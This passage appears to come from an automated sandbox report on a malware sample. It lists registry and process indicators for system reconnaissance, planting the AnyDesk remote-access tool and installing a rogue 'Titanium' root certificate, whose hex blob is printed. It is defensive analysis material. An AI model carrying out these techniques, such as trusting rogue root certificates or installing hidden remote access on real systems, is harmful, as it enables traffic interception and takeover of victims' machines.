| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = [binary data omitted] | C:\Windows\system32\vssvc.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\FuturesClient.exe = "11000" | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_CLIPCHILDREN_OPTIMIZATION\FuturesClient.exe = "1" | C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\AnyDesk\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --play \"%1\"" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" \"%1\"" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3350944739-639801879-157714471-1000\{3A8DC9F9-B29E-48C5-A534-888D43A36AF1} | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\",0" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [binary data omitted] | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = [binary data omitted] | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380038003700450038003400360044002d0036004200440039002d0034003100440033002d0038003200390042002d004500420044003000300045003700320035003600420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f
52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00330045003700370034004400380036002d0045003900330033002d0034004400370037002d0041003500360043002d004100300039004300390041004500350036004500330035007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23